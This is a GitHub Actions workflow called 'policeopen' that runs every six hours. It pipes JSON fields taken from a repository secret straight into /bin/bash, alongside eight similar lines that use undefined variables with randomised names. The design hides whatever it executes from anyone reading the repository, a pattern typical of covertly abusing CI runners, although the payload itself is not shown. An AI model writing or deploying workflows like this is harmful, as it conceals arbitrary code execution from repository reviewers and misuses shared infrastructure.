name: policeopen
on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: policeopen
        env:
          ggq7256: ${{ secrets.ggq7256 }}
        run: |
          echo $ggq7256 | jq -r .jwuy37 | /bin/bash
          echo $jimpx5 | jq -r .vejjo54 | /bin/bash
          echo $odzc08785 | jq -r .e772 | /bin/bash
          echo $vt5 | jq -r .uvllj825 | /bin/bash
          echo $skw64002 | jq -r .yne427 | /bin/bash
          echo $lpskx7422 | jq -r .yj5 | /bin/bash
          echo $obpsq95 | jq -r .qg7 | /bin/bash
          echo $kdu0 | jq -r .e4 | /bin/bash
          echo $bbhqy58 | jq -r .di25441 | /bin/bash

